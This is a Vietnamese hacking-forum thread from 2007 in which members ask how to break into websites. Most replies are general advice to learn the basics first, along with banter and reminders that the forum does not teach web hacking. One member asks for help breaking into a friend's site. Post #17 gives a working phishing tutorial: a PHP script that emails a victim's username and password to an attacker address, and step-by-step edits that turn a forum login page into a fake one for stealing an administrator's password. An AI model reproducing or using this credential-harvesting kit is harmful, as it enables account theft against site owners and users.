Các cách để thâm nhập một website

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

Các cách để thâm nhập một website

[Question] Các cách để thâm nhập một website	03/02/2007 23:09:02 (+0700) \| #1 \| 39756

kemkem
Member

Joined: 20/01/2007 16:19:28
Messages: 27
Offline

cho hỏi có những cách cơ bản nào để thâm nhập vào một website. lỗi thường gặp của một website là gì.
ví dụ: lỗi lập trình, lỗi quản trị...
các bạn thảo luận cùng chủ đề này nhé.

[Question] Các cách để thâm nhập một website	03/02/2007 23:45:29 (+0700) \| #2 \| 39773

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

kemkem wrote:

cho hỏi có những cách cơ bản nào để thâm nhập vào một website. lỗi thường gặp của một website là gì.
ví dụ: lỗi lập trình, lỗi quản trị...
các bạn thảo luận cùng chủ đề này nhé.

Để mở đầu, tôi xin đặt ra 1 câu hỏi mang tính tổng thể: một web site thường có những thành phần cấu trúc nào? chúng làm việc với nhau làm sao? và tại sao chúng có thể bị lỗi?

What bringing us together is stronger than what pulling us apart.

[Question] Các cách để thâm nhập một website	04/02/2007 00:09:27 (+0700) \| #3 \| 39782

hackerbeyeu
Member

Joined: 07/12/2006 09:42:37
Messages: 54
Location: The Reaper
Offline

kemkem wrote:

cho hỏi có những cách cơ bản nào để thâm nhập vào một website. lỗi thường gặp của một website là gì.
ví dụ: lỗi lập trình, lỗi quản trị...
các bạn thảo luận cùng chủ đề này nhé.

bác conmale nói rất đúng đó,em xin được phép trích thêm lời của bác conmale
- website đó chạy trên hệ điều hành nào?
- website đó chạy bằng web softwares nào? phiên bản bao nhiêu?
- website đó chạy bằng công nghệ nào? dùng ngôn ngữ nào?
- website đó gắn với một CSDL như thế nào?
- CSDL đó chạy bằng software nào?
- CSDL đó có những bảng nào?
- cả web và CSDL cho phép truy xuất, truy vấn dữ liệu ra làm sao?

bạn nên đọc kỹ nha
thân

[Question] Các cách để thâm nhập một website	05/02/2007 06:32:19 (+0700) \| #4 \| 40008

rindodinho
Member

Joined: 30/06/2006 16:03:19
Messages: 2
Offline

mình thấy đây là 1 chủ đề hay! va có lẽ trong thời gian tới sẽ có nhiều người quan tâm đến vấn đề này.HY VỌNG NHỮNG NGƯỜI TÀI sẽ giúp đỡ.

[Question] Các cách để thâm nhập một website	05/02/2007 14:30:49 (+0700) \| #5 \| 40087

channhua
Elite Member

Joined: 18/07/2003 04:49:28
Messages: 338
Offline

Để mở đầu, tôi xin đặt ra 1 câu hỏi mang tính tổng thể: một web site thường có những thành phần cấu trúc nào? chúng làm việc với nhau làm sao? và tại sao chúng có thể bị lỗi?

Anh có thể liệt kê những câu hỏi chi tiết hơn dạng như hackerbeyeu dễ trả lời hơn. không ?

[Question] Các cách để thâm nhập một website	05/02/2007 19:06:31 (+0700) \| #6 \| 40104

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

channhua wrote:

Để mở đầu, tôi xin đặt ra 1 câu hỏi mang tính tổng thể: một web site thường có những thành phần cấu trúc nào? chúng làm việc với nhau làm sao? và tại sao chúng có thể bị lỗi?

Anh có thể liệt kê những câu hỏi chi tiết hơn dạng như hackerbeyeu dễ trả lời hơn. không ?

Hì hì, đoạn hackerbeyeu trích cũng là đoạn anh dùng trong một topic khác đó smilie

What bringing us together is stronger than what pulling us apart.

[Question] Các cách để thâm nhập một website	06/02/2007 06:12:51 (+0700) \| #7 \| 40181

kenji
Member

Joined: 24/09/2003 13:20:28
Messages: 77
Offline

về OS (như win chẳng hạn vì dễ hình dung): xem có bug nào mới ko? các bug cũ đã được fix chưa?
Software: có bao nhiêu chức năng? và mỗi chức năng cho load bao nhiêu?
CSDL: cái ni căng quá vì rộng lớn quá? ko biết nó có bị mấy cái lỗi SQL injection mà dân chúng hay "chơi" ko? điều nữa là web động hay tĩnh
Quan trọng là cơ sở hạ tầng nó là như thế nào? nếu của nhà nước thì cứ ghé vào chơi hehe.. nhưng coi chùng bị "gõ" lúc nào ko hay.

Vài ý kiến đóng góp để mọi người cùng thảo luận. Các bác đừng cừoi vì em chỉ biết nhiu đó thui. Mong các bác chỉ bảo thêm.

[Question] Các cách để thâm nhập một website	06/02/2007 06:59:44 (+0700) \| #8 \| 40188

thichankemlanh
Member

Joined: 18/01/2007 11:06:16
Messages: 3
Offline

đang định thâm nhập wed của thằng bạn
nhờ các sư huynh giúp đỡ

[Question] Re: Các cách để thâm nhập một website	06/02/2007 07:04:26 (+0700) \| #9 \| 40189

enn3exlibs
Elite Member

Joined: 10/12/2006 16:54:02
Messages: 243
Location: bluesun
Offline

conmale wrote:

kemkem wrote:

cho hỏi có những cách cơ bản nào để thâm nhập vào một website. lỗi thường gặp của một website là gì.
ví dụ: lỗi lập trình, lỗi quản trị...
các bạn thảo luận cùng chủ đề này nhé.

Để mở đầu, tôi xin đặt ra 1 câu hỏi mang tính tổng thể: một web site thường có những thành phần cấu trúc nào? chúng làm việc với nhau làm sao? và tại sao chúng có thể bị lỗi?

Bị mắc kẹt với khái niệm "thành phần cấu trúc" của anh. Cho em hỏi nguyên bản tiếng anh của khái niệm này là gì vậy?

[Question] Các cách để thâm nhập một website	08/02/2007 02:01:06 (+0700) \| #10 \| 40546

nam_haui
Member

Joined: 28/06/2006 15:59:53
Messages: 27
Offline

anh oai, giả sử mình chỉ xâm nhập vào một website dùng tên miền miễn phí, như là .tk,tf,goog.to..... thì liệu có cách nào đơn giản không anh

[Question] Re: Các cách để thâm nhập một website	08/02/2007 03:33:27 (+0700) \| #11 \| 40565

vikjava
Elite Member

Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline

sao mấy anh không đọc kỹ câu trả lời của conmale mà cứ đâm đầu vào hỏi vậy trời . Cứ đâm đầu vào hack hiếc mà không có cái nên tảng vững vàng thì làm vậy để làm gì vậy trời ... thân.

[Question] Các cách để thâm nhập một website	08/02/2007 05:51:54 (+0700) \| #12 \| 40596

pnco
HVA Friend

Joined: 24/06/2005 16:33:48
Messages: 515
Offline

vikjava wrote:

Cứ đâm đầu vào hack hiếc..

Đâm đầu vô coi đầu ai cứng hơn smilie

)

[Question] Các cách để thâm nhập một website	08/02/2007 13:27:26 (+0700) \| #13 \| 40668

dirmemay
Locked

Joined: 02/02/2007 00:38:53
Messages: 3
Offline

Hic hic ! sori mọi người đừng chê em, nhưng cho em hỏi :
Website chạy trên hdh nào là sao ? la HDH của cái j ? của server à ?
Web software là cái chi ?
có cách nào để biết tất cả nhưng thông tin như anh hacker... đã nêu ?

[Question] Các cách để thâm nhập một website	08/02/2007 18:00:42 (+0700) \| #14 \| 40697

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

dirmemay wrote:

Hic hic ! sori mọi người đừng chê em, nhưng cho em hỏi :
Website chạy trên hdh nào là sao ? la HDH của cái j ? của server à ?
Web software là cái chi ?
có cách nào để biết tất cả nhưng thông tin như anh hacker... đã nêu ?

Học căn bản máy tính trước.

What bringing us together is stronger than what pulling us apart.

[Question] Re: Các cách để thâm nhập một website	08/02/2007 21:53:34 (+0700) \| #15 \| 40709

vikjava
Elite Member

Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline

dạo này không biết ban quản trị và nhất là anh conmale có thấy hva mình tếu tếu không vậy. Nhiều câu hỏi toàn cao siêu hack này hack nọ nhưng khi ban quản trị trả lời hoặc member trả lời thì chủ nhân topic lại hỏi những câu botay.com . Dạo gần đây em đọc nhiều topic như thế rùi ... mất hứng thật . Hình như member nghỉ rằng hva dạy hack hay sao đó . Ah dạo này em thấy anh conmale dễ chịu ghê . Vài lời ... thân

[Question] Re: Các cách để thâm nhập một website	10/02/2007 08:23:06 (+0700) \| #16 \| 40988

nhuyk
Member

Joined: 07/02/2007 18:28:31
Messages: 2
Offline

Sao mấy ông nghĩ đơn giản quá vậy. Để hack một website cần phải nắm vững rất nhiều kiến thức. Mà mấy ông chỉ đơn giản post câu hỏi lên rồi tham khảo là hack được sao. Cần phải học nhiều nhiều mới hack được.

[Question] Các cách để thâm nhập một website	11/02/2007 00:15:42 (+0700) \| #17 \| 41047

gnolcud89
Member

Joined: 10/08/2005 02:41:53
Messages: 1
Offline

InvisionBoard Forum .. các forum khác làm cũng tương tự

Thực ra cách này cũng đơn giản như cách làm fake login trong yahoo ..tuy nhiên để làm fake login trong forum phải wa bước sữ source ... kingasawa đã nghiên cứu kĩ và hôm nay đưa ra bài hướng dẫn để chia sẽ với các bạn ..

Chuẩn Bị :

Bạn chuẩn bị file kingasawa.php với source như sau :

CODE
<?
$contactemail = "kingasawa@yahoo.com"; //
$subject = "password of user";
$message = " $passwd la pass cua $user";
mail($contactemail, $subject, $message);
header("location: http://victim.com\");
?>

$contactemail và location bạn phải sửa lại cho phù hợp với nhu cầu của bạn ..

Bước tiếp theo nào ... bạn mở forum của victim lên ( forum mà bạn muốn lấy pass của admin ) --> vào phần login --> viewsource ...
và chúng ta bắt đầu sửa source của nó để làm 1 trang fake login forum

Bạn kiếm dòng :

CODE
<body background='style_images/1/' leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" alink='#000000' vlink='#000000'>

Thêm vào sau nó :

CODE
<FORM name=LOGIN action="kingasawa.php" method="post" autocomplete="off">

Tiếp tục tìm :

CODE
function ValidateForm() {
var Check = 0;

Thêm vào bên dưới :

CODE
var passwd = form.LOGIN.passwd.value;
var user = form.LOGIN.user.value;

Tìm :

CODE
if (document.LOGIN.UserName.value == '') { Check = 1; }
if (document.LOGIN.PassWord.value == '') { Check = 1; }

Thay đoạn đó bằng đoạn sau :

CODE
if (document.LOGIN.user.value == '') { Check = 1; }
if (document.LOGIN.passwd.value == '') { Check = 1; }

Tìm dòng :

CODE
name='UserName'

thay bằng :

CODE
name='user'

tưong tự thay :

CODE
name='PassWord'

thành :

CODE
name='passwd'

Như vậy là xong được bước sữa source cũng là bước khó nhất ..

Bước này bạn phải làm sao dụ thằng admin vào ngay cái trang login giả của forum nó .. có 1 cách ...

[Question] Re: Các cách để thâm nhập một website	11/02/2007 01:23:24 (+0700) \| #18 \| 41056

hackerbeyeu
Member

Joined: 07/12/2006 09:42:37
Messages: 54
Location: The Reaper
Offline

Bước tiếp theo nào ... bạn mở forum của victim lên ( forum mà bạn muốn lấy pass của admin ) --> vào phần login --> viewsource ...
và chúng ta bắt đầu sửa source của nó để làm 1 trang fake login forum

Bạn tưởng trang nào cũng viewsource được à ..... smilie

-))

Bước này bạn phải làm sao dụ thằng admin vào ngay cái trang login giả của forum nó .. có 1 cách ...

Bạn nghĩ admin là Member à

[Question] Các cách để thâm nhập một website	12/02/2007 21:39:04 (+0700) \| #19 \| 41316

alone_rock
Member

Joined: 06/01/2007 16:08:01
Messages: 23
Offline

Xin nói nhỏ với các bác muốn thâm nhập website :
Đảm bảo các bác sẽ ko lấy được bất cứ thông tin gì về việc thâm nhập website từ conmale đâu. Hí hí
Tốt nhất các bác nên bỏ thời gian đi đọc " Những cuộc đối thoại với rookie " đi đã.
Khi đọc xong rồi bác sẽ biết thêm một chút, ko nên đánh đồng từ hacker với cracker, anh conmale nhỉ.
Đọc những đoạn anh viết : Biến đi đồ ngốc, cút đi thằng đần... => chết cười (_ _")

[Question] Các cách để thâm nhập một website	26/02/2007 12:15:39 (+0700) \| #20 \| 43167

segoviahp
Member

Joined: 25/02/2007 15:58:40
Messages: 4
Offline

uhm, có vẻ hack được 1 web, kể cả là web được power bởi 1 host free, không có bảo mật cũng khó nhỉ.
Lại còn phải dụ thằng admin nữa
Mà bác nói có 1 cách thì nói thẳng ra đi, còn mập mờ nữa

[Question] Các cách để thâm nhập một website	01/03/2007 02:12:11 (+0700) \| #21 \| 43720

ngutrencaychuoi
Member

Joined: 08/02/2007 14:07:59
Messages: 37
Offline

Tui thấy đọc xong mấy cái topic này chẳng thu lượm được gì cả! Cả mod lẫn 1 vài member đều nói suông, chê bai, nịnh nhau, xem đi thì biết. Mặt dù đây kô phải nơi đào tạo hacker nhưng cũng phải ví dụ 1 vài cách hack web khác nhau, ai đủ trình độ thì hiểu và phòng chống, hay đơn giản học hỏi thêm; Đằng này các pác nói nhảm, vậy thì đưng nói hay hơn!...Thân.

[Question] Các cách để thâm nhập một website	01/03/2007 04:17:53 (+0700) \| #22 \| 43753

delua
Locked

Joined: 28/12/2006 00:48:39
Messages: 102
Offline

Diễn đàn không chủ trương "đào tạo hack web" bạn ơi.

[Question] Các cách để thâm nhập một website	01/03/2007 04:23:48 (+0700) \| #23 \| 43756

canh_nguyen
Elite Member

Joined: 23/08/2004 18:55:09
Messages: 775
Location: Broken dream
Offline

ngutrencaychuoi wrote:

Tui thấy đọc xong mấy cái topic này chẳng thu lượm được gì cả! Cả mod lẫn 1 vài member đều nói suông, chê bai, nịnh nhau, xem đi thì biết. Mặt dù đây kô phải nơi đào tạo hacker nhưng cũng phải ví dụ 1 vài cách hack web khác nhau, ai đủ trình độ thì hiểu và phòng chống, hay đơn giản học hỏi thêm; Đằng này các pác nói nhảm, vậy thì đưng nói hay hơn!...Thân.

Tui chưa biết, bạn chứng minh hộ tui với.

[Question] Các cách để thâm nhập một website	03/03/2007 11:37:55 (+0700) \| #24 \| 44279

thamtu20119
Member

Joined: 19/02/2007 22:53:59
Messages: 29
Location: HP online
Offline

Nói chung tôi đọc một hồi thì biết đc mấy website view source đc thì có thể hack đc, nhưng còn phải dụ thằng admin... Dụ đc nó thì thà dụ nó đọc pass cho luôn có phải hơn ko... Còn đâu ko view đc thì chịu chết, có đúng ko ???

[Question] Các cách để thâm nhập một website	04/03/2007 01:48:17 (+0700) \| #25 \| 44345

canh_nguyen
Elite Member

Joined: 23/08/2004 18:55:09
Messages: 775
Location: Broken dream
Offline

thamtu20119 wrote:

Nói chung tôi đọc một hồi thì biết đc mấy website view source đc thì có thể hack đc, nhưng còn phải dụ thằng admin... Dụ đc nó thì thà dụ nó đọc pass cho luôn có phải hơn ko... Còn đâu ko view đc thì chịu chết, có đúng ko ???

Thật đó hả smilie

[Question] Các cách để thâm nhập một website	04/03/2007 11:05:20 (+0700) \| #26 \| 44454

thamtu20119
Member

Joined: 19/02/2007 22:53:59
Messages: 29
Location: HP online
Offline

Hic tui đang là người hỏi bạn lại cho câu " Thật đó hả" là sao hả ???

[Question] Các cách để thâm nhập một website	08/03/2007 06:52:53 (+0700) \| #27 \| 45269

cuongbk
Member

Joined: 09/11/2004 00:58:45
Messages: 77
Location: Hà Nội
Offline

Theo mình nghĩ ai có kinh nghiệm và thủ thuật hack website thì nên nói ra cho mọi người biết để mình từ đó có nhiều kinh nghiệm và cách phòng tránh cho chính website của mình. Thanks.

[Question] Re: Các cách để thâm nhập một website	08/03/2007 07:55:03 (+0700) \| #28 \| 45279

vikjava
Elite Member

Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline

uhm cái thu lượm được là chúng ta nên học cái nền tảng đi , khi đã hiểu cái nền tảng thì mới bắt đầu tim hiểu điểm yếu và mạnh .... nến tảng không có mà hack hiếc cái nỗi gì.

[Question] Re: Các cách để thâm nhập một website	09/03/2007 09:30:38 (+0700) \| #29 \| 45487

vietphuongtd
Member

Joined: 15/10/2005 01:27:12
Messages: 41
Location: TNCT
Offline

Tớ vẫn thích các bài dậy hack kiểu step by step nhanh, gọn dễ hiểu...
bảo mật thì có thể thuê ngoài.
Nhưng hack thì không thuê được vì chẳng ai cho phép viết hóa đơn thanh toán thuê hack cả :wink:

[Question] Re: Các cách để thâm nhập một website	13/03/2007 00:56:11 (+0700) \| #30 \| 46197

AdministratorX5
Member

Joined: 12/03/2007 13:21:18
Messages: 4
Offline

Bạn này mạnh mồm thế ! chưa gì đã chửi ngừoi ta ! nếu bạn có tài thật thì nói ra cho anh em tham khảo nào

Go to:

Users currently in here
1 Anonymous